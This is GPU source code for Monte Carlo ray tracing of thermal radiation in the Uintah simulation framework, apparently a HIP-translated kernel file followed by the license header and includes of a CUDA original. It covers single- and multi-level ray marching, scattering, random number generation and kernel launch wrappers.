CC_pos.z - 0.5*Dx.z ); GPUVector tMax; tMax.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; //Length of t to traverse one cell GPUVector tDelta; tDelta = Abs(inv_ray_direction) * Dx; //Initializes the following values for each ray bool in_domain = true; double tMax_prev = 0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; #ifdef RAY_SCATTER double scatCoeff = RT_flags.sigmaScat; //[m^-1] !! HACK !! This needs to come from data warehouse if (scatCoeff == 0) scatCoeff = 1e-99; // avoid division by zero // Determine the length at which scattering will occur // See CCA/Components/Arches/RMCRT/PaulasAttic/MCRT/ArchesRMCRT/ray.cc double scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; #endif //+++++++Begin ray tracing+++++++++++++++++++ //Threshold while loop while ( intensity > RT_flags.threshold ){ DIR dir = NONE; while (in_domain){ prevCell = cur; double disMin = -9; // Represents ray segment length. //__________________________________ // Determine which cell the ray will enter next dir = NONE; if ( tMax.x < tMax.y ){ // X < Y if ( tMax.x < tMax.z ){ // X < Z dir = X; } else { dir = Z; } } else { if( tMax.y < tMax.z ){ // Y < Z dir = Y; } else { dir = Z; } } //__________________________________ // update marching variables cur[dir] = cur[dir] + step[dir]; disMin = (tMax[dir] - tMax_prev); tMax_prev = tMax[dir]; tMax[dir] = tMax[dir] + tDelta[dir]; rayLength += disMin; ray_location.x = ray_location.x + (disMin * ray_direction.x); ray_location.y = ray_location.y + (disMin * ray_direction.y); ray_location.z = ray_location.z + (disMin * ray_direction.z); in_domain = (celltype[cur] == d_flowCell); optical_thickness += abskg[prevCell]*disMin; RT_flags.nRaySteps ++; #if ( DEBUG >= 1 ) if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] prev [%d,%d,%d] ", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); printf( "tMax [%g,%g,%g] ",tMax.x,tMax.y, tMax.z); printf( "rayLoc [%g,%g,%g] ",ray_location.x,ray_location.y, ray_location.z); printf( "distanceTraveled %g tMax[dir]: %g tMax_prev: %g, Dx[dir]: %g\n",disMin, tMax[dir], tMax_prev, Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta.x, tDelta.y, tDelta.z); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevCell], sigmaT4OverPi[prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i\n",abskg[cur], sigmaT4OverPi[cur], celltype[cur] ); printf( " optical_thickkness %g \t rayLength: %g\n", optical_thickness, rayLength); } #endif //Eqn 3-15(see below reference) while //Third term inside the parentheses is accounted for in Inet. Chi is accounted for in Inet calc. 
double expOpticalThick = exp(-optical_thickness); sumI += sigmaT4OverPi[prevCell] * ( expOpticalThick_prev - expOpticalThick ) * fs; expOpticalThick_prev = expOpticalThick; #ifdef RAY_SCATTER if ( (rayLength > scatLength) && in_domain){ // get new scatLength for each scattering event scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; ray_direction = findRayDirectionDevice( randNumStates ); inv_ray_direction = 1.0/ray_direction; // get new step and sign int stepOld = step[dir]; raySignStepDevice( sign, step, ray_direction); // if sign[dir] changes sign, put ray back into prevCell (back scattering) // a sign change only occurs when the product of old and new is negative if( step[dir] * stepOld < 0 ){ cur = prevCell; } GPUPoint CC_pos = level.getCellPosition(cur); // rayDx is the distance from bottom, left, back, corner of cell to ray rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_pos.z - 0.5*Dx.z ); tMax.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; // Length of t to traverse one cell tDelta = Abs(inv_ray_direction) * Dx; tMax_prev = 0; rayLength = 0; // allow for multiple scattering events per ray #if (DEBUG == 3) if( isDbgCellDevice( origin) ){ printf( " Scatter: [%i, %i, %i], rayLength: %g, tmax: %g, %g, %g tDelta: %g, %g, %g ray_dir: %g, %g, %g\n",cur.x, cur.y, cur.z,rayLength, tMax[0], tMax[1], tMax[2], tDelta.x, tDelta.y , tDelta.z, ray_direction.x, ray_direction.y , ray_direction.z); printf( " dir: %i sign: [%g, %g, %g], step [%i, %i, %i] cur: [%i, %i, %i], prevCell: [%i, %i, %i]\n", dir, sign[0], sign[1], sign[2], step[0], step[1], step[2], cur[0], cur[1], cur[2], prevCell[0], prevCell[1], prevCell[2] ); printf( " ray_location: [%g, %g, %g]\n", ray_location[0], ray_location[1], ray_location[2] ); // printf(" rayDx [%g, %g, %g] CC_pos[%g, %g, %g]\n", rayDx[0], rayDx[1], rayDx[2], CC_pos.x, CC_pos.y, CC_pos.z); } #endif } #endif } //end domain while loop. // wall emission 12/15/11 double wallEmissivity = abskg[cur]; if (wallEmissivity > 1.0){ // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if( !RT_flags.allowReflect ){ intensity = 0; } #if DEBUG >0 if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] intensity: %g expOptThick: %g, fs: %g allowReflect: %i \n", cur.x, cur.y, cur.z, intensity, exp(-optical_thickness), fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ( (intensity > RT_flags.threshold) && RT_flags.allowReflect){ reflect( fs, cur, prevCell, abskg[cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop.
} // end of updateSumI function //______________________________________________________________________ // Multi-level template< class T> __device__ void updateSumI_MLDevice ( GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, gridParams gridP, const GPUIntVector& fineLevel_ROI_Lo, const GPUIntVector& fineLevel_ROI_Hi, const int3* regionLo, const int3* regionHi, const GPUGridVariable< T >* sigmaT4OverPi, const GPUGridVariable< T >* abskg, const GPUGridVariable<int>* cellType, double& sumI, hiprandState_t* randNumStates, RMCRT_flags RT_flags ) { int maxLevels = gridP.maxLevels; // for readability int L = maxLevels - 1; // finest level int prevLev = L; GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; GPUVector inv_ray_direction = 1.0 / ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI_ML: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, inv_ray_direction); //__________________________________ // define tMax & tDelta on all levels // go from finest to coarset level so you can compare // with 1L rayTrace results. GPUPoint CC_posOrigin = d_levels[L].getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; GPUVector Dx = d_levels[L].Dx; rayDx[0] = ray_origin.x - ( CC_posOrigin.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_posOrigin.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_posOrigin.z - 0.5*Dx.z ); GPUVector tMaxV; tMaxV.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMaxV.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMaxV.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; GPUVector tDelta[d_MAXLEVELS]; for (int Lev = maxLevels - 1; Lev > -1; Lev--) { //Length of t to traverse one cell tDelta[Lev].x = fabs(inv_ray_direction[0]) * d_levels[Lev].Dx.x; tDelta[Lev].y = fabs(inv_ray_direction[1]) * d_levels[Lev].Dx.y; tDelta[Lev].z = fabs(inv_ray_direction[2]) * d_levels[Lev].Dx.z; } //Initializes the following values for each ray bool in_domain = true; GPUVector tMaxV_prev = make_double3(0.0,0.0,0.0); double old_length = 0.0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections bool onFineLevel = true; double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; GPUPoint CC_pos = CC_posOrigin; //______________________________________________________________________ // Threshold loop while (intensity > RT_flags.threshold) { DIR dir = NONE; while (in_domain) { prevCell = cur; prevLev = L; //__________________________________ // Determine the princple direction the ray is traveling // dir = NONE; if (tMaxV.x < tMaxV.y) { // X < Y if (tMaxV.x < tMaxV.z) { // X < Z dir = X; } else { dir = Z; } } else { if (tMaxV.y < tMaxV.z) { // Y < Z dir = Y; } else { dir = Z; } } // next cell index and position cur[dir] = cur[dir] + step[dir]; //__________________________________ // Logic for moving between levels // - Currently you can only move from fine to coarse level // - Don't jump levels if ray is at edge of domain CC_pos = d_levels[L].getCellPosition(cur); in_domain = gridP.domain_BB.inside(CC_pos); // position could be outside of domain bool ray_outside_ROI = ( 
containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir) == false ); bool ray_outside_Region = ( containsCellDevice(regionLo[L], regionHi[L], cur, dir) == false ); bool jumpFinetoCoarserLevel = ( onFineLevel && ray_outside_ROI && in_domain ); bool jumpCoarsetoCoarserLevel = ( (onFineLevel == false) && ray_outside_Region && (L > 0) && in_domain ); //#define ML_DEBUG #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " Ray: [%i,%i,%i] **jumpFinetoCoarserLevel %i jumpCoarsetoCoarserLevel %i containsCell: %i ", cur.x, cur.y, cur.z, jumpFinetoCoarserLevel, jumpCoarsetoCoarserLevel, containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir)); printf( " onFineLevel: %i ray_outside_ROI: %i ray_outside_Region: %i in_domain: %i\n", onFineLevel, ray_outside_ROI, ray_outside_Region,in_domain ); printf( " L: %i regionLo: [%i,%i,%i], regionHi: [%i,%i,%i]\n",L,regionLo[L].x,regionLo[L].y,regionLo[L].z, regionHi[L].x,regionHi[L].y,regionHi[L].z); } #endif if (jumpFinetoCoarserLevel) { cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level onFineLevel = false; #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " ** Jumping off fine patch switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i] \n",prevLev, L, cur.x, cur.y, cur.z); } #endif } else if (jumpCoarsetoCoarserLevel) { //GPUIntVector c_old = cur; // needed for debugging cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " ** Switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i], c_old: [%i,%i,%i]\n",prevLev, L, cur.x, cur.y, cur.z, c_old.x, c_old.y, c_old.z); } #endif } //__________________________________ // update marching variables double distanceTraveled = (tMaxV[dir] - old_length); old_length = tMaxV[dir]; tMaxV_prev = tMaxV; tMaxV[dir] = tMaxV[dir] + tDelta[L][dir]; ray_location.x = ray_location.x + ( distanceTraveled * ray_direction.x ); ray_location.y = ray_location.y + ( distanceTraveled * ray_direction.y ); ray_location.z = ray_location.z + ( distanceTraveled * ray_direction.z ); //__________________________________ // when moving to a coarse level tmax will change only in the direction the ray is moving if ( jumpFinetoCoarserLevel || jumpCoarsetoCoarserLevel ){ GPUVector dx = d_levels[L].Dx; double rayDx_Level = ray_location[dir] - ( CC_pos[dir] - 0.5*dx[dir] ); double tMax_tmp = ( sign[dir] * dx[dir] - rayDx_Level ) * inv_ray_direction[dir]; tMaxV = tMaxV_prev; tMaxV[dir] += tMax_tmp; #if DEBUG >0 if( isDbgCellDevice(origin) ) { printf(" Jumping from fine to coarse level: rayDxLevel: %g tmax_tmp: %g dir: %i, CC_pos[dir] %g\n", rayDx_Level, tMax_tmp,dir, CC_pos[dir]); } #endif } // if the cell isn't a flow cell then terminate the ray in_domain = in_domain && (cellType[L][cur] == d_flowCell) ; rayLength += distanceTraveled; optical_thickness += abskg[prevLev][prevCell] * distanceTraveled; double expOpticalThick = exp(-optical_thickness); #if DEBUG == 1 // This sucks --Todd if( isDbgCellDevice(origin) ) { printf( " cur [%d,%d,%d] prev [%d,%d,%d]", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); // printf( " stepSize [%i,%i,%i] ",step[0],step[1],step[2]); printf( "tMaxV [%g,%g,%g] ", tMaxV[0],tMaxV[1], tMaxV[2]); printf( "rayLoc [%4.5f,%4.5f,%4.5f] ",ray_location.x,ray_location.y, ray_location.z); 
printf( "\tdistanceTraveled %4.5f tMaxV[dir]: %g tMaxV_prev[dir]: %g , Dx[dir]: %g\n",distanceTraveled, tMaxV[dir], tMaxV_prev[dir], d_levels[L].Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta[L].x,tDelta[L].y, tDelta[L].z); // printf( "inv_dir [%g,%g,%g] ",inv_direction.x(),inv_direction.y(), inv_direction.z()); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevLev][prevCell], sigmaT4OverPi[prevLev][prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i \n",abskg[L][cur], sigmaT4OverPi[L][cur], cellType[L][cur]); // printf( " Dx[prevLev].x %g \n", Dx[prevLev].x() ); printf( " optical_thickkness %g \t rayLength: %g \tSumI %g\n", optical_thickness, rayLength, sumI); } #endif sumI += sigmaT4OverPi[prevLev][prevCell] * (expOpticalThick_prev - expOpticalThick) * fs; expOpticalThick_prev = expOpticalThick; } //end domain while loop. ++++++++++++++ //__________________________________ // double wallEmissivity = abskg[L][cur]; if (wallEmissivity > 1.0) { // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[L][cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if (!RT_flags.allowReflect){ intensity = 0; } #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf( " C) intensity: %g OptThick: %g, fs: %g allowReflect: %i\n", intensity, optical_thickness, fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ((intensity > RT_flags.threshold) && RT_flags.allowReflect) { reflect(fs, cur, prevCell, abskg[L][cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop. } // end of updateSumI function //______________________________________________________________________ // Returns random number between 0 & 1.0 including 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblDevice(hiprandState_t* globalState) { int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; int tid = blockId * blockDim.x * blockDim.y * blockDim.z + threadIdx.z * blockDim.y * blockDim.x + threadIdx.y * blockDim.x + threadIdx.x; hiprandState_t localState = globalState[tid]; double val = hiprand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return (double)val * (1.0/4294967295.0); #endif } //______________________________________________________________________ // Returns random number between 0 & 1.0 excluding 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblExcDevice(hiprandState_t* globalState) { int tid = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; hiprandState_t localState = globalState[tid]; double val = hiprand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return ( (double)val + 0.5 ) * (1.0/4294967296.0); #endif } //______________________________________________________________________ // Returns random integer in [0,n] // rnd_integer_from_A_to_B = A + hiprand() * (B-A); // A = 0 //______________________________________________________________________ __device__ int randIntDevice(hiprandState_t* globalState, const int B ) { double val = randDblDevice( globalState ); return val * B; } 
//______________________________________________________________________ // Each thread gets same seed, a different sequence number, no offset // This will create repeatable results. __device__ void setupRandNumsSeedAndSequences(hiprandState_t* randNumStates, int numStates, unsigned long long patchID, unsigned long long curTimeStep) { // Generate random numbers using hiprand_init(). // Format is hiprand_init(seed, sequence, offset, state); // Note, it seems a very large sequence really slows things down (bits in the high order region) // I measured kernels taking an additional 300 milliseconds due to it! So the sequence is kept // small, using lower order bits only, and intead the seed is given a number with bits in both the // high order and low order regions. // Unfortunately this isn't perfect. "Sequences generated with different seeds // usually do not have statistically correlated values, but some choices of seeds may give // statistically correlated sequences. Sequences generated with the same seed and different // sequence numbers will not have statistically correlated values." from here: // http://docs.nvidia.com/cuda/hiprand/device-api-overview.html#axzz4SPy8xMuj // For RMCRT we will take the tradeoff of possibly having statistically correlated values over // the 300 millisecond hit. // Generate what should be a unique seed. To get a unique number the code below computes a tID // which is a combination of a patchID, threadID, and the current timestep. // This uses the left 20 bits from the patchID, the next 20 bits from the curTimeStep // and the last 24 bits from the indexId. Combined that should be unique. //Standard CUDA way of computing a threadID int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; int threadId = blockId * blockDim.x * blockDim.y * blockDim.z + threadIdx.z * blockDim.y * blockDim.x + threadIdx.y * blockDim.x + threadIdx.x; unsigned long long tID = (((patchID & 0xFFFFF) << 44) | ((curTimeStep& 0xFFFFF) << 24) | (threadId & 0xFFFFFF)); hiprand_init(tID, threadId, 0, &randNumStates[threadId]); //If you want to take the 300 millisecond hit, use this line below instead. //hiprand_init(1234, tID, 0, &randNumStates[threadId]); } //______________________________________________________________________ // is cell a debug cell __device__ bool isDbgCellDevice( GPUIntVector me ) { int size = 2; GPUIntVector dbgCell[2]; dbgCell[0] = make_int3(0,0,0); dbgCell[1] = make_int3(5,5,5); for (int i = 0; i < size; i++) { if( me == dbgCell[i]){ return true; } } return false; } //______________________________________________________________________ // //Math.h has an std::isnan and std::isinf. CUDA has an isnan and isinf macro (not in a namespace, and not a function) //This .cu file sees both, so trying to use the CUDA isnan gives compiler ambiguity errors. //Dan Sutherland with Sandia said they solved this problem by using their own isnan and isinf //So here is the code for that. They're also renamed to isNan and isInf to keep things separate. 
//(Code was found at http://stackoverflow.com/questions/2249110/how-do-i-make-a-portable-isnan-isinf-function //and adapted from https://github.com/Itseez/opencv/blob/3.0.0/modules/hal/include/opencv2/hal/defs.h#L447 ) typedef unsigned long long uint64; __device__ int isInf(double x) { union { uint64 u; double f; } ieee754; ieee754.f = x; return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) == 0x7ff00000 && ( (unsigned)ieee754.u == 0 ); } __device__ int isNan(double x) { union { uint64 u; double f; } ieee754; ieee754.f = x; return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) + ( (unsigned)ieee754.u != 0 ) > 0x7ff00000; } __device__ int isInf( float value ) { union { unsigned int u; float f; } ieee754; ieee754.f = value; return (ieee754.u & 0x7fffffff) == 0x7f800000; } __device__ int isNan( float value ) { union { unsigned int u; float f; } ieee754; ieee754.f = value; return (ieee754.u & 0x7fffffff) > 0x7f800000; } //______________________________________________________________________ // Perform some sanity checks on the Variable. This is for debugging template< class T> __device__ void GPUVariableSanityCK(const GPUGridVariable<T>& Q, const GPUIntVector Lo, const GPUIntVector Hi) { #if SCI_ASSERTION_LEVEL > 0 if (isThread0()) { GPUIntVector varLo = Q.getLowIndex(); GPUIntVector varHi = Q.getHighIndex(); if( Lo < varLo || varHi < Hi){ printf ( "ERROR: GPUVariableSanityCK \n"); printf(" Variable: varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", varLo.x, varLo.y, varLo.z, varHi.x, varHi.y, varHi.z); printf(" Requested extents: varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", Lo.x, Lo.y, Lo.z, Hi.x, Hi.y, Hi.z); printf(" Now exiting..."); __threadfence(); asm("trap;"); } for (int i = Lo.x; i < Hi.x; i++) { for (int j = Lo.y; j < Hi.y; j++) { for (int k = Lo.z; k < Hi.z; k++) { GPUIntVector idx = make_int3(i, j, k); T me = Q[idx]; if ( isNan(me) || isInf(me)){ printf ( "isNan or isInf was detected at [%i,%i,%i]\n", i,j,k); printf(" Now exiting..."); __threadfence(); asm("trap;"); } } // k loop } // j loop } // i loop } // thread0 #endif } template __device__ void GPUVariableSanityCK(const GPUGridVariable<float>& Q, const GPUIntVector Lo, const GPUIntVector Hi); template __device__ void GPUVariableSanityCK(const GPUGridVariable<double>& Q, const GPUIntVector Lo, const GPUIntVector Hi); //______________________________________________________________________ // template< class T> __host__ void launchRayTraceKernel(DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw) { // setup random number generator states on the device, 1 for each thread hiprandState_t* randNumStates; int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z; randNumStates = (hiprandState_t*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(hiprandState_t)); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates); //Create a host array, load it with data, and send it over to the GPU int nRandNums = 512; double* d_debugRandNums; size_t randNumsByteSize = nRandNums * sizeof(double); d_debugRandNums = (double*)GPUMemoryPool::allocateCudaSpaceFromPool(0, randNumsByteSize); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, d_debugRandNums); //Making sure we have kernel/mem copy overlapping double* h_debugRandNums = new double[nRandNums];
hipHostRegister(h_debugRandNums, randNumsByteSize, hipHostRegisterPortable); //perform computations here on h_debugRandNums for (int i = 0; i < nRandNums; i++) { h_debugRandNums[i] = i; } dtask->addTempHostMemoryToBeFreedOnCompletion(h_debugRandNums); hipMemcpyAsync(d_debugRandNums, h_debugRandNums, randNumsByteSize, hipMemcpyHostToDevice, *stream ); hipLaunchKernelGGL(( rayTraceKernel< T >), dim3(dimGrid), dim3(dimBlock), 0, *stream , dimGrid, dimBlock, matlIndx, level, patch, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); #if DEBUG > 0 hipDeviceSynchronize(); // so printF will work #endif } //______________________________________________________________________ // template< class T> __host__ void launchRayTraceDataOnionKernel( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // copy regionLo & regionHi to device memory int maxLevels = gridP.maxLevels; int3* dev_regionLo; int3* dev_regionHi; size_t size = d_MAXLEVELS * sizeof(int3); dev_regionLo = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dev_regionHi = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionLo); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionHi); //More GPU stuff to allow kernel/copy overlapping int3 * myLo = new int3[d_MAXLEVELS]; hipHostRegister(myLo, sizeof(int3) * d_MAXLEVELS, hipHostRegisterPortable); int3 * myHi = new int3[d_MAXLEVELS]; hipHostRegister(myHi, sizeof(int3) * d_MAXLEVELS, hipHostRegisterPortable); dtask->addTempHostMemoryToBeFreedOnCompletion(myLo); dtask->addTempHostMemoryToBeFreedOnCompletion(myHi); for (int l = 0; l < maxLevels; ++l) { myLo[l] = levelP[l].regionLo; // never use levelP regionLo or hi in the kernel. 
myHi[l] = levelP[l].regionHi; // They are different on each patch } CUDA_RT_SAFE_CALL( hipMemcpyAsync( dev_regionLo, myLo, size, hipMemcpyHostToDevice, *stream) ); CUDA_RT_SAFE_CALL( hipMemcpyAsync( dev_regionHi, myHi, size, hipMemcpyHostToDevice, *stream) ); //__________________________________ // copy levelParams array to constant memory on device CUDA_RT_SAFE_CALL(hipMemcpyToSymbolAsync(d_levels, levelP, (maxLevels * sizeof(levelParams)),0, hipMemcpyHostToDevice,*stream)); //__________________________________ // setup random number generator states on the device, 1 for each thread int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z; hiprandState_t* randNumStates; randNumStates = (hiprandState_t*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(hiprandState_t)); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates); hipLaunchKernelGGL(( rayTraceDataOnionKernel< T >), dim3(dimGrid), dim3(dimBlock), 0, *stream , dimGrid, dimBlock, matlIndex, patch, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, dev_regionLo, dev_regionHi, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); //hipDeviceSynchronize(); //hipError_t result = hipPeekAtLastError(); //printf("After the error code for patch %d was %d\n", patch.ID, result); #if DEBUG > 0 hipDeviceSynchronize(); #endif } //______________________________________________________________________ // Explicit template instantiations template __host__ void launchRayTraceKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* celltype_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); } //end namespace Uintah
4af0e54c4c3497c17d9e89041e6ff7533ac12d13.cu
/* * The MIT License * * Copyright (c) 1997-2018 The University of Utah * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include <CCA/Components/Models/Radiation/RMCRT/RayGPU.cuh> #include <CCA/Components/Schedulers/GPUDataWarehouse.h> #include <CCA/Components/Schedulers/GPUMemoryPool.h> #include <CCA/Components/Schedulers/DetailedTasks.h> #include <Core/Grid/Variables/GPUGridVariable.h> #include <Core/Grid/Variables/GPUStencil7.h> #include <Core/Grid/Variables/Stencil7.h> #include <Core/Util/GPU.h> #include <sci_defs/cuda_defs.h> #include <sci_defs/uintah_defs.h> #include <curand.h> #include <curand_kernel.h> #define __CUDA_INTERNAL_COMPILATION__ #include "math_functions.h" // needed for max() #undef __CUDA_INTERNAL_COMPILATION__ #define DEBUG -9 // 1: divQ, 2: boundFlux, 3: scattering //#define FIXED_RANDOM_NUM // also edit in src/Core/Math/MersenneTwister.h to compare with Ray:CPU #define FIXED_RAY_DIR -9 